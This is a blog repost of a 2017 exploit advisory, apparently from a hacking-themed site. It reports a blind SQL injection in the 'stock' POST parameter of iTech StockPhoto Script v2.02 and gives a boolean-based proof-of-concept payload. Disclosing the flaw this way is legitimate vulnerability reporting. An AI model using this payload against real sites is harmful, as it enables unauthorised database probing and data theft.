Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863561928

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: iTech StockPhoto Script v2.02 - SQL Injection
# Date: 2017-09-11
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/stockphoto-script
# Version: 2.02
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-11

Product & Service Introduction:
===============================
This is a versatile script to help you launch a stock photo website like Sutterstock.

Technical Details & Description:
================================

Blind SQL injection on [stock] POST parameter.

Proof of Concept (PoC):
=======================

The parameter is sent when downloading an image.

Parameter: stock (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stock=19 AND 9771=9771

==================
8bitsec - [https://twitter.com/_8bitsec]